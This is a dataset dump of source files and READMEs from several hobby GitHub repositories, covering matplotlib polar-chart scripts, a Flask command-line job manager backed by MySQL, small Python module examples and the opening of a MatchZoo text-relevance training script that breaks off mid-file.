[ { "alpha_fraction": 0.7117117047309875, "alphanum_fraction": 0.7117117047309875, "avg_line_length": 26.5, "blob_id": "0fa0c5102c003d94a64c1808aef65836c4287bf0", "content_id": "63fe2760b4af4af2e75d0e21a67537015b624585", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "no_license", "max_line_length": 84, "num_lines": 4, "path": "/README.md", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "Radar-Chart\n===========\n\nThis resposity is built for storing some basic examples to build the Tool of Change. \n" }, { "alpha_fraction": 0.4847009778022766, "alphanum_fraction": 0.5319888591766357, "avg_line_length": 26.150943756103516, "blob_id": "f332981f65a52baf64d282118bfb041e24233307", "content_id": "61e77753dee18676483c27070f0d5b3518ec2f6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 96, "num_lines": 53, "path": "/polar_test_1.py", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 22, 2014\n\n@author: 507061\n'''\n# Working flow\n# 1.Program the backgroud\n# 2.Program layers\n# 3.Program marks\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Create radius and theta arrays, and a 2d radius/theta array\nradius = np.linspace(0.5,1,100)\ntheta = np.linspace(0,2*np.pi,100) #100 slices\nprint theta\n\nR,T = np.meshgrid(radius,theta)\n\n#Calculate some values to plot\nZfun = lambda R,T: R**2*np.cos(T)\nZ = Zfun(R,T) #color\n\n#Create figure and polar axis\nfig = plt.figure()\nax = fig.add_subplot(111, polar = True)\n\n#-----------------------------------------------------------------------------------\n#Plot flexible graphs\nax.pcolor(T,R,Z) #Plot calculated values\n\n#-----------------------------------------------------------------------------------\n#Plot thick red section and label it\ntheta = np.linspace(0,np.pi/4,21) #this is a line\nax.plot(theta,[1.23 for t in theta],color='#AA5555',linewidth=10) #Colors are set by hex codes\n\n#-----------------------------------------------------------------------------------\n#Plot bar chats\nrect = plt.bar(left = (0,1,2),height = (0.5,1,1.5),color='#AA5555',width = 0.35,align=\"center\")\n\n#-----------------------------------------------------------------------------------\n\n\nax.text(np.pi/8,1.25,\"Text\")\n\nax.set_rmax(1.5) #Set maximum radius\n\n#Turn off polar labels\nax.axes.get_xaxis().set_visible(False)\n# ax.axes.get_yaxis().set_visible(False)\n\nplt.show()" }, { "alpha_fraction": 0.5580912828445435, "alphanum_fraction": 0.6473029255867004, "avg_line_length": 19.125, "blob_id": "e064846ec78870cd8dfa658012b6ad4b5c7d56f0", "content_id": "e5dca0e9f36b4c42cd3732823b625e5f185a4b64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 49, "num_lines": 24, "path": "/polar_test_2.py", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "'''\nCreated on Jul 22, 2014\n\n@author: 507061\n'''\nfrom pylab import *\n\nax = axes([0.025,0.025,0.95,0.95], polar=True)\n\nN = 20\ntheta = np.arange(0.0, 2*np.pi, 2*np.pi/N)\nradii = 10*np.random.rand(N)\nwidth = np.pi/4*np.random.rand(N)\nbars = bar(theta, radii, width=width, bottom=0.0)\nprint bars\n\nfor r,bar in zip(radii, bars):\n bar.set_facecolor( cm.jet(r/10.))\n bar.set_alpha(0.5)\n\nax.set_xticklabels([])\nax.set_yticklabels([])\n# savefig('../figures/polar_ex.png',dpi=48)\nshow()" }, { "alpha_fraction": 0.29212889075279236, "alphanum_fraction": 0.5705229640007019, "avg_line_length": 26.449275970458984, "blob_id": "c8ee6daa50b3b7f5373f35fe004a05be1319ba03", "content_id": "c7aefb995451ef18e32d8464cc0d7e35409c6cad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1893, "license_type": "no_license", "max_line_length": 81, "num_lines": 69, "path": "/radar_chart.py", "repo_name": "Superbeet/Radar-Chart", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n# x = np.arange(-180.0,190.0,10)\n# theta = (np.pi/180.0 )*x # in radians\n# \n# offset = 2.0\n# \n# R1 = [-0.358,-0.483,-0.479,-0.346,-0.121,0.137,0.358,0.483,0.479,0.346,0.121,\\\n# -0.137,-0.358,-0.483,-0.479,-0.346,-0.121,0.137,0.358,0.483,0.479,0.346,0.121,\\\n# -0.137,-0.358,-0.483,-0.479,-0.346,-0.121,0.137,0.358,0.483,0.479,0.346,0.121,\\\n# -0.137,-0.358]\n# \n# fig1 = plt.figure()\n# ax1 = fig1.add_axes([0.1,0.1,0.8,0.8],polar=True)\n# ax1.set_rmax(1)\n# ax1.plot(theta,R1,lw=2.5)\n# plt.show()\n\n\n\n\n# x = np.arange(-90.0,95.0,5)\n# # x = [-180. -170. -160. -150. -140. -130. -120. -110. -100. -90. -80. -70.\n# # -60. -50. -40. -30. -20. -10. 0. 10. 20. 30. 40. 50.\n# # 60. 70. 80. 90. 100. 110. 120. 130. 140. 150. 160. 170.\n# # 180.]\n# \n# theta = (np.pi/180.0 )*x # in radians\n# \n# offset = 2.0\n# \n# R2 = [1.642,1.517,1.521,1.654,1.879,2.137,2.358,2.483,2.479,2.346,2.121,1.863,\\\n# 1.642,1.517,1.521,1.654,1.879,2.137,2.358,2.483,2.479,2.346,2.121,1.863,1.642,\\\n# 1.517,1.521,1.654,1.879,2.137,2.358,2.483,2.479,2.346,2.121,1.863,1.642]\n# \n# fig2 = plt.figure()\n# ax2 = fig2.add_axes([0.1,0.1,0.8,0.8],polar=True)\n# ax2.plot(theta,R2,lw=2.5) \n# ax2.set_rmax(1.5*offset)\n# plt.show()\n\nradian_unit = np.pi/180\n\noffset = 2.0\nxAxis_1 = [0 for i in range(500)]\nyAxis_1 = np.arange(0,5,0.01)\n\nfig2 = plt.figure()\n#rect = l,b,w,h\nax2 = fig2.add_axes([0.1,0.1,0.8,0.8],polar=True)\nax2.plot(xAxis_1,yAxis_1,lw=2.5) \nax2.set_rmax(1.5*offset)\n\nxAxis_2 = [radian_unit*45 for i in range(500)]\nyAxis_2 = np.arange(0,5,0.01)\n\nax2 = fig2.add_axes([0.1,0.1,0.8,0.8],polar=True)\nax2.plot(xAxis_2,yAxis_2,lw=2.5) \nax2.set_rmax(1.5*offset)\n\n# style = 'r-'\n# x = np.arange(0, 2*np.pi, 0.1)\n# y = np.sin(x)\n# line = ax2.plot(x, y, style, animated=True)[0]\n# line.set_ydata(np.sin(j*x + i/10.0))\n\nplt.show()" } ]
4
Vitaee/FlaskCLIProject
https://github.com/Vitaee/FlaskCLIProject
c3a2a14ba911d91e0e5a0844572a1728af8c9b82
8584f85a944a6ced78de67f2e73a5ee4a8e70141
7931614e675c3794a4e52cabaaf4047f3ccd454c
refs/heads/main
2023-04-26T12:35:15.350531
2021-05-12T18:04:10
2021-05-12T18:04:10
366,806,290
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.7543160915374756, "alphanum_fraction": 0.7543160915374756, "avg_line_length": 40.66666793823242, "blob_id": "132d4841490685f77b0d3a46342a14c751340db6", "content_id": "22b41f8729c24a5699530263aa502d5e81262f5e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 753, "license_type": "no_license", "max_line_length": 109, "num_lines": 18, "path": "/flaskProject/README.md", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "# Flask CLI Project\n\n### Requirements which is done or can continue to be improved.\n\n- Flask framework must use &check;\n- Command line interface must be used&check;\n- Command line arguments must be used &check;\n- Config file must be used for database server connection and other parameters &check;\n- Log method can be changeable via arguments &check;\n- Jobs should be able to be run asynchronously &check;\n\n### What will to do\n\n- There will be a jobs table on database server, this table can be created with command line argument &check;\n- A job can be added with command line arguments &check;\n- Job list can be get with command line arguments &check;\n- A job's status can be changed &check;\n- A job can be deleted via command line argument &check;\n\n\n\n" }, { "alpha_fraction": 0.6671199202537537, "alphanum_fraction": 0.6701114773750305, "avg_line_length": 29.26749038696289, "blob_id": "223c6cccf784b8d8ccf6b3fb1493bda183aa5cb7", "content_id": "87c11995f09ffa4c43a6ee52506b2bc885bacaf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7354, "license_type": "no_license", "max_line_length": 201, "num_lines": 243, "path": "/flaskProject/app.py", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "import datetime, click,threading,asyncio,logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask, request, jsonify, make_response\nfrom flask.cli import cli, with_appcontext\nfrom flask_sqlalchemy import SQLAlchemy\nfrom marshmallow import fields\nfrom marshmallow_sqlalchemy import ModelSchema\nfrom flask_migrate import Migrate\n\n\n# Init Flask App\napp = Flask(__name__)\n\n# Init DB\ndb = SQLAlchemy(app)\nmigrate = Migrate(app, db)\n\n# Create Model\nclass Job(db.Model):\n __tablename__ = \"jobs\"\n id = db.Column(db.Integer, primary_key=True)\n job = db.Column(db.String(200), nullable=False)\n status = db.Column(db.Boolean(), nullable=False)\n date_added = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n\n def create(self):\n db.session.add(self)\n db.session.commit()\n return self\n\n def __init__(self, job, status):\n self.job = job\n self.status = status\n\n def __repr__(self):\n return f'{int(self.id)}'\n\n# Define ModelSchema\nclass JobSchema(ModelSchema):\n class Meta(ModelSchema.Meta):\n model = Job\n sqla_session = db.session\n\n id = fields.Number(dump_only=True)\n job = fields.String(required=True)\n status = fields.Boolean(required=True)\n\n\n# Get config file\napp.config.from_pyfile(\"./config/app.conf\",silent=True)\n\n# DB & Secret Key from config file\napp.config['SQLALCHEMY_DATABASE_URI'] = f'mysql+pymysql://{app.config.get(\"DB_USER\")}:{app.config.get(\"DB_PASS\")}@{app.config.get(\"DB_URL\")}:{app.config.get(\"DB_PORT\")}/{app.config.get(\"DB_DATABASE\")}'\napp.config['SECRET_KEY'] = f'{app.config.get(\"FLASK_SECRET\")}'\n\n# Debug method from config file\nif app.debug is not True and app.config.get(\"LOG_METHOD\") != \"DEBUG\":\n file_handler = RotatingFileHandler('jobsflask.log', maxBytes=1024 * 1024 * 100, backupCount=20)\n file_handler.setLevel(logging.ERROR)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n file_handler.setFormatter(formatter)\n app.logger.addHandler(file_handler)\nelse:\n logging.basicConfig(level=logging.DEBUG)\n\n\n# Define command name and create funciton. Creates table named as jobs.\[email protected](name=\"createdb\")\n@with_appcontext\ndef create_db():\n db.create_all()\n app.logger.info(\"Db created.\")\n\n# Changing log method.\[email protected](name=\"logmethod\")\n@with_appcontext\ndef change_log_method():\n print(f\"Inside logmethod function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(change_log())\n app.logger.info('Log method changed')\n return jsonify({\"result\": result})\n\n\n# Adding jobs.\[email protected](name=\"addjob\")\[email protected]('job')\[email protected]('status')\n@with_appcontext\ndef add_job(job,status):\n \n print(f\"Inside addjob function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(create_it(job,status))\n app.logger.info('Job added.')\n return jsonify({\"result\": result})\n\n# Get all jobs.\[email protected](name=\"getjobs\")\n@with_appcontext\ndef get_jobs():\n print(f\"Inside get jobs function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(all_jobs())\n app.logger.info('Jobs are fetched.')\n return jsonify({\"result\": result})\n\n# Update job by id.\[email protected](name=\"updatejob\")\[email protected](\"status\")\[email protected](\"id\")\n@with_appcontext\ndef update_job(id,status):\n print(f\"Inside update job function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(update_job_status(id,status))\n app.logger.info('Job updated.')\n return jsonify({\"result\": result})\n\n# Delete job by id.\[email protected](name=\"deletejob\")\[email protected](\"id\")\n@with_appcontext\ndef deletejob(id):\n print(f\"Inside delete job function: {threading.current_thread().name}\")\n asyncio.set_event_loop(asyncio.new_event_loop())\n loop = asyncio.get_event_loop()\n result = loop.run_until_complete(delete_job(id))\n app.logger.info(\"Job deleted.\")\n return jsonify({\"result\": result})\n\n# Adding cli commands.\napp.cli.add_command(create_db)\napp.cli.add_command(add_job)\napp.cli.add_command(get_jobs)\napp.cli.add_command(update_job)\napp.cli.add_command(change_log_method)\n\n\n# Define async functions for jobs.\nasync def create_it(job,status):\n job = str(job.capitalize())\n status = str(status).capitalize()\n data = {\n \"job\":job,\n \"status\":bool(status)\n }\n todo_schema = JobSchema()\n todo = todo_schema.load(data)\n result = await todo_schema.dump(todo.create())\n return result\n\nasync def all_jobs():\n get_jobs = await Job.query.all()\n job_schema = JobSchema(many=True)\n todos = await job_schema.dump(get_jobs)\n return todos\n\nasync def update_job_status(id,status):\n status = str(status).capitalize()\n data = {\n \n \"status\":bool(status),\n }\n get_job = await Job.query.get(int(id))\n get_job.todo_description = data['status']\n db.session.add(get_job)\n db.session.commit()\n todo_schema = JobSchema(only=['id', 'status'])\n todo = await todo_schema.dump(get_job)\n return todo\n\nasync def delete_job(id):\n try:\n get_job = await Job.query.get(int(id))\n except:\n app.logger.error(\"The job does not exist!\")\n \n\n db.session.delete(get_job)\n db.session.commit()\n return \"Job deleted.\"\n\nasync def change_log():\n if app.config.get(\"LOG_METHOD\") == 'Pro':\n app.config.update(LOG_METHOD=\"DEBUG\",APP_DEBUG=True)\n else:\n app.config.update(LOG_METHOD=\"Pro\", APP_DEBUG=False)\n\n return \"Log method changed\"\n\n\n\n# Sample example of CRUD Api.\[email protected]('/create', methods=['POST'])\ndef create_job():\n data = request.get_json()\n todo_schema = JobSchema()\n todo = todo_schema.load(data)\n result = todo_schema.dump(todo.create())\n return make_response(jsonify({\"job\": result}), 200)\n\[email protected]('/gets', methods=['GET'])\ndef index():\n get_todos = Job.query.all()\n todo_schema = JobSchema(many=True)\n todos = todo_schema.dump(get_todos)\n return make_response(jsonify({\"jobs\": todos}))\n\[email protected]('/get/<id>', methods=['GET'])\ndef get_job_by_id(id):\n get_todo = Job.query.get(id)\n todo_schema = JobSchema()\n todo = todo_schema.dump(get_todo)\n return make_response(jsonify({\"job\": todo}))\n\[email protected]('/update/<id>', methods=['PUT'])\ndef update_job_by_id(id):\n data = request.get_json()\n get_todo = Job.query.get(id)\n if data.get('job'):\n get_todo.title = data['job']\n if data.get('status'):\n get_todo.todo_description = data['status']\n db.session.add(get_todo)\n db.session.commit()\n todo_schema = JobSchema(only=['id', 'job', 'status'])\n todo = todo_schema.dump(get_todo)\n return make_response(jsonify({\"job\": todo}))\n\[email protected]('/delete/<id>', methods=['DELETE'])\ndef delete_todo_by_id(id):\n get_todo = Job.query.get(id)\n db.session.delete(get_todo)\n db.session.commit()\n return make_response(\"\", 204)\n\nif __name__ == \"__main__\":\n app.run(debug=app.config.get(\"APP_DEBUG\"))" }, { "alpha_fraction": 0.8987341523170471, "alphanum_fraction": 0.8987341523170471, "avg_line_length": 12.333333015441895, "blob_id": "322b3539491a41be3968575fbb4461fd4ae26c5e", "content_id": "a48e824f830383a8f4775ba36b46d37ea92b78a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 79, "license_type": "no_license", "max_line_length": 22, "num_lines": 6, "path": "/requirement.txt", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "Flask\nFlask-Migrate\nmarshmallow-sqlalchemy\nmarshmallow\nFlask-SQLAlchemy\nasyncio" }, { "alpha_fraction": 0.7771084308624268, "alphanum_fraction": 0.7771084308624268, "avg_line_length": 45.47999954223633, "blob_id": "3b7b40eae03f88e847c2eaa070929b79baca158d", "content_id": "8cc6fa2b4615c893fb39edf25f8a3074dfd43a64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1162, "license_type": "no_license", "max_line_length": 121, "num_lines": 25, "path": "/README.md", "repo_name": "Vitaee/FlaskCLIProject", "src_encoding": "UTF-8", "text": "# Project Overview\nThis project will execute some jobs (ddls/dmls) over a database server asynchronously.\n\n\n# Requirements\n- Flask framework must use\n- Command line interface must be used\n- Command line arguments must be used\n- Config file must be used for database server connection and other parameters\n- Log method can be changeable via arguments (console, log file, etc.), default log method must be defined in config file\n- Jobs should be able to be run asynchronously\n- OOP approach must be used\n- Comments must be added to each element\n- 'Keep it Simple' approach must be used\n\n\n# What Will To Do\n- There will be a jobs table on database server, this table can be created with command line argument\n- A job can be added with command line arguments (May be read different sources: argument/file/etc...)\n- Job list can be get with command line arguments \n- A job's status can be changed as ignore via command line argument\n- A job can be deleted via command line argument\n- A job can start/stop via command line argument\n- Job's state must be checked for desired operation\n- A log item must be added to defined or given log method for each command's result\n" } ]
4
kennandavison/flask-stock-quote
https://github.com/kennandavison/flask-stock-quote
531d065146abd5111a91576ac074e431a3d69780
9eed737b801dcf02ada4b9c8062819fe2ab74add
08314fbe149f955dd78b6cd10f76de08dccdfab9
refs/heads/master
2016-08-10T11:51:50.239094
2016-03-07T20:18:42
2016-03-07T20:18:42
47,805,434
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.48349055647850037, "alphanum_fraction": 0.6816037893295288, "avg_line_length": 14.703703880310059, "blob_id": "82b432ded2b550c1d0a17a7cb3486dac5995125f", "content_id": "53ec117b1c9553c50e940043466a0238ed48202e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 424, "license_type": "no_license", "max_line_length": 21, "num_lines": 27, "path": "/requirements.txt", "repo_name": "kennandavison/flask-stock-quote", "src_encoding": "UTF-8", "text": "alembic==0.8.3\nclick==5.1\ndecorator==4.0.4\ndict==0.0.2\nFlask==0.10.1\nFlask-API==0.6.4\nFlask-Compress==1.3.0\nFlask-Migrate==1.6.0\nFlask-Script==2.0.5\nFlask-SQLAlchemy==2.1\nget==0.0.2\ngunicorn==19.3.0\nitsdangerous==0.24\nJinja2==2.8\nMako==1.0.3\nMarkupSafe==0.23\npsycopg2==2.6.1\npublic==0.0.2\npython-editor==0.4\nredis==2.10.5\nrequest==0.0.2\nrequests==2.8.1\nrq==0.5.6\nself==0.0.2\nSQLAlchemy==1.0.9\nWerkzeug==0.11.2\nwheel==0.24.0\n" }, { "alpha_fraction": 0.5904631018638611, "alphanum_fraction": 0.5987048745155334, "avg_line_length": 41.82352828979492, "blob_id": "41271fe7e651309ea74a31b57468ff12bce1d620", "content_id": "f55e1c409d83af8df8e2513f37ddac315c5d7343", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5096, "license_type": "no_license", "max_line_length": 214, "num_lines": 119, "path": "/app.py", "repo_name": "kennandavison/flask-stock-quote", "src_encoding": "UTF-8", "text": "from flask import Flask, redirect, render_template\nfrom flask.ext.compress import Compress\nimport requests\nfrom decimal import getcontext, Decimal\n\napp = Flask(__name__)\nCompress(app)\napp.config['DEBUG'] = True\napp.config['TESTING'] = True\n\n\[email protected]('/')\ndef root_redirect():\n return redirect(\"/AAPL\", code=302)\n\n\[email protected]('/<ticker>', methods=['GET'])\ndef check(ticker):\n ticker = ticker.upper() # make ticker uppercase to prevent errors\n yahoo_api = requests.get(\"http://query.yahooapis.com/v1/public/yql?q=select%20*%20from%20yahoo.finance.quotes%20where%20symbol%20IN%20(%22\" + ticker + \"%22)&format=json&env=http://datatables.org/alltables.env\")\n stocktwits_api = requests.get(\"https://api.stocktwits.com/api/2/streams/symbol/\" + ticker + \".json\")\n getcontext().prec = 5\n\n def parse_yahoo(detail):\n parsed_yahoo_detail = yahoo_api.json()['query']['results']['quote'][detail]\n return parsed_yahoo_detail\n\n def parse_stocktwits_feed():\n stocktwits_feed = {}\n for i in range(0, 30): # 30 is rate limit\n if stocktwits_api:\n message = stocktwits_api.json()['messages'][i]['body']\n username = stocktwits_api.json()['messages'][i]['user']['username']\n stocktwits_feed[i] = message + \" ~\" + username\n return stocktwits_feed\n\n def get_short_term_rating():\n upside = get_upside()\n eps_upside = get_eps_upside()\n if upside and eps_upside is not None:\n upside_weight = upside * Decimal(0.75)\n eps_upside_weight = eps_upside * Decimal(0.25)\n rating = upside_weight + eps_upside_weight\n return rating\n\n def get_upside():\n target_price_parse = parse_yahoo(\"OneyrTargetPrice\")\n price = get_price()\n if target_price_parse and price is not None:\n target_price = Decimal(target_price_parse)\n upside = (Decimal(target_price - price) / price) * 100\n return upside\n\n def get_price():\n ask_parse = parse_yahoo(\"Ask\")\n bid_parse = parse_yahoo(\"Bid\")\n if ask_parse and bid_parse is not None:\n price = (Decimal(ask_parse) + Decimal(bid_parse)) / 2\n return price\n\n def get_eps_upside():\n eps_current_year_parse = parse_yahoo(\"EPSEstimateCurrentYear\")\n eps_next_year_parse = parse_yahoo(\"EPSEstimateNextYear\")\n if eps_current_year_parse and eps_next_year_parse is not None:\n eps_current_year_dec = Decimal(eps_current_year_parse)\n eps_next_year_dec = Decimal(eps_next_year_parse)\n eps_upside = ((eps_next_year_dec - eps_current_year_dec) / abs(eps_current_year_dec)) * 100\n return eps_upside\n\n def get_news():\n news = {\n \"stocktwits_url\": \"//stocktwits.com/symbol/\" + ticker,\n 'estimize_url': \"//www.estimize.com/\" + ticker,\n \"earningswhispers_url\": \"//earningswhispers.com/stocks/\" + ticker,\n \"nasdaq_url\": \"//nasdaq.com/earnings/report/\" + ticker,\n \"googlenews_url\": \"//google.com/search?q=\" + ticker + \"+stock&tbm=nws\",\n \"googlefinance_main_url\": \"//google.com/finance?q=\" + ticker,\n \"googlefinance_news_url\": \"//google.com/finance/company_news?q=\" + ticker,\n \"marketbeat_url\": \"//marketbeat.com/stocks/\" + ticker,\n \"closingbell_url\": \"//closingbell.co/stocks/\" + ticker,\n \"bloomberg_url\": \"//bloomberg.com/quote/\" + ticker + \":US\",\n \"thestreet_url\": \"//thestreet.com/quote/\" + ticker + \".html\",\n }\n return news\n\n stock = {\n \"short_term_rating\": get_short_term_rating(),\n \"symbol\": parse_yahoo(\"symbol\"),\n \"name\": parse_yahoo(\"Name\"),\n \"currency\": parse_yahoo(\"Currency\"),\n \"upside\": str(get_upside()) + \"%\",\n \"target_price\": parse_yahoo(\"OneyrTargetPrice\"),\n \"price\": get_price(),\n \"ask\": parse_yahoo(\"Ask\"),\n \"bid\": parse_yahoo(\"Bid\"),\n \"ask_real_time\": parse_yahoo(\"AskRealtime\"),\n \"bid_real_time\": parse_yahoo(\"BidRealtime\"),\n \"amount_change\": parse_yahoo(\"Change\"),\n \"percent_change\": parse_yahoo(\"ChangeinPercent\"),\n \"year_low\": parse_yahoo(\"YearLow\"),\n \"year_high\": parse_yahoo(\"YearHigh\"),\n \"year_range\": parse_yahoo(\"YearRange\"),\n \"day_range\": parse_yahoo(\"DaysRange\"),\n \"volume\": parse_yahoo(\"Volume\"),\n \"market_cap\": parse_yahoo(\"MarketCapitalization\"),\n \"average_daily_volume\": parse_yahoo(\"AverageDailyVolume\"),\n \"eps_upside\": str(get_eps_upside()) + \"%\",\n \"eps_estimate_current_year\": parse_yahoo(\"EPSEstimateCurrentYear\"),\n \"eps_estimate_next_year\": parse_yahoo(\"EPSEstimateNextYear\"),\n \"eps_estimate_next_quarter\": parse_yahoo(\"EPSEstimateNextQuarter\"),\n \"pe_ratio\": parse_yahoo(\"PERatio\"),\n \"peg_ratio\": parse_yahoo(\"PEGRatio\"),\n \"news\": get_news(),\n \"stocktwits_feed\": parse_stocktwits_feed(),\n }\n return render_template(\"index.html\", stock=stock)\n\nif __name__ == '__main__':\n app.run()\n" }, { "alpha_fraction": 0.7437499761581421, "alphanum_fraction": 0.75, "avg_line_length": 22.52941131591797, "blob_id": "62e4df519ab39973ac7ac30b50b02ea1e6d426ba", "content_id": "0a558d4356d0db1d145fed634955063863265e8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 800, "license_type": "no_license", "max_line_length": 109, "num_lines": 34, "path": "/README.md", "repo_name": "kennandavison/flask-stock-quote", "src_encoding": "UTF-8", "text": "### flask-stock-quote\n\n- Heroku App: stockquoter.kennandavison.com\n- Description: GET a stock quote and automate price upside/EPS upside calculation (and a few other things)...\n\n### Implemented Features\n- Stock Search\n- Automated EPS and Price Upside Calculation\n- News & Media\n- Analyst Estimates\n- StockTwits Feed\n\n### Future Features\n- Multiple Stock Quote (compare upsides)\n- Twitter Feed/MarketBeat API\n- D3 Visualizations\n- Portfolio\n- Quantopian Algorithms (in development...)\n- Swap Stock Data Source\n- Real-time Data (using Celery + Redis to update)\n\n### Tech Stack\n- Flask\n- Python\n\n### Full Installation\n\nPackage Installation: pip install -r requirements.txt (make sure to be in same directory)\n\nRunning App: python app.py\n\n### REST Commands\n\nGET: https://localhost:5000/aapl - AAPL Quote\n" } ]
3
Architect0711/PythonReference
https://github.com/Architect0711/PythonReference
b6ef3e3e5c488a677592b35e2a53d4930cb261ad
c96a745aa5bf407c843e6e6f8e2b0cc300d98379
6c88cc70c2d3bec27b7a82d065eb69919621c206
refs/heads/master
2021-08-15T17:24:43.324099
2021-04-20T21:25:03
2021-04-20T21:25:03
249,081,252
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6133333444595337, "alphanum_fraction": 0.653333306312561, "avg_line_length": 24, "blob_id": "a08c2897c72a9249bb55afe185c730831d336de8", "content_id": "80dbfc487611caddb4d1dccb525c0e48d283c5f2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 75, "license_type": "permissive", "max_line_length": 42, "num_lines": 3, "path": "/OOP/my_module_folder/__init__.py", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "__all__ = [ \"my_submodule_1\" ]\n\nfrom .my_submodule_1 import my_submodule_1\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.6565656661987305, "avg_line_length": 24, "blob_id": "771af40e90899cb125140dc8dfc3e96880b00d09", "content_id": "35f7c32122a3c2d322b59ef13e72506243c0122a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 99, "license_type": "permissive", "max_line_length": 46, "num_lines": 4, "path": "/OOP/my_module_folder/my_submodule_1.py", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "class my_submodule_1():\n\n def do_something(self):\n print(\"my_submodule_1 does something\")" }, { "alpha_fraction": 0.5384615659713745, "alphanum_fraction": 0.5769230723381042, "avg_line_length": 20, "blob_id": "8a7e7a5b2d27684c5c7ced47482a3949feafeaa3", "content_id": "5b30fd496b963e697aa8e0003029d891d7b46554", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 104, "license_type": "permissive", "max_line_length": 33, "num_lines": 5, "path": "/OOP/my_module.py", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "def method_1():\n print(\"my_module.method_1()\")\n \ndef method_2():\n print(\"my_module.method_2()\")" }, { "alpha_fraction": 0.8181818127632141, "alphanum_fraction": 0.8181818127632141, "avg_line_length": 54, "blob_id": "eaaff597ee58838a97bfdfdd224e2169afd872b1", "content_id": "02a03a8f2db7a6db7d698ee66050daed4df1974c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 110, "license_type": "permissive", "max_line_length": 91, "num_lines": 2, "path": "/README.md", "repo_name": "Architect0711/PythonReference", "src_encoding": "UTF-8", "text": "# PythonReference\nHelping me memorize what I learned and build a pallet of code snippets while I learn Python\n" } ]
4
thepanacealab/RDoC-Shared-sub-tasks-2019
https://github.com/thepanacealab/RDoC-Shared-sub-tasks-2019
488f172c562c8dedd1e7d1e6fae7bc54d2e9d666
9782250affe1ced7fab826db5df92d28e0eecdb8
1dff9be46ad48b35518de0b02417ac11619b3f94
refs/heads/master
2020-05-29T08:56:31.539402
2019-06-10T22:20:31
2019-06-10T22:20:31
189,044,586
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7055005431175232, "alphanum_fraction": 0.7244848012924194, "avg_line_length": 29.06341552734375, "blob_id": "5151d1d51ed8df407d40697c0510a317ebdd1d61", "content_id": "cc9abae2a02659081fb68458fda9e8333608da85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6163, "license_type": "no_license", "max_line_length": 117, "num_lines": 205, "path": "/relevance.py", "repo_name": "thepanacealab/RDoC-Shared-sub-tasks-2019", "src_encoding": "UTF-8", "text": "import typing\nfrom pathlib import Path\nimport pandas as pd\nimport matchzoo as mz\nimport keras\nimport numpy as np\n\n\n\ndef load_data(path: str = 'train.csv') -> typing.Union[mz.DataPack, typing.Tuple[mz.DataPack, list]]:\n\tdata_pack = mz.pack(pd.read_csv(path, index_col=0,error_bad_lines=False))\n\n\tdata_pack.relation['label'] = data_pack.relation['label'].astype('float32')\n\t#print(len(data_pack))\n\treturn data_pack\n\n\n\n######################\ntrain_path='new_train.csv'\nvalid_path='new_dev.csv'\n######################\n\ntrain_pack = load_data(train_path)\nvalid_pack = load_data(valid_path)\n#predict_pack = load_data('test.csv')\n\n'''\npreprocessor = mz.preprocessors.DSSMPreprocessor()\nranking_task = mz.tasks.Ranking(loss=mz.losses.RankCrossEntropyLoss(num_neg=4))\ntrain_processed = preprocessor.fit_transform(train_pack)\nvalid_processed = preprocessor.transform(valid_pack)\n\n\n\nranking_task.metrics = [\n mz.metrics.NormalizedDiscountedCumulativeGain(k=3),\n mz.metrics.NormalizedDiscountedCumulativeGain(k=5),\n 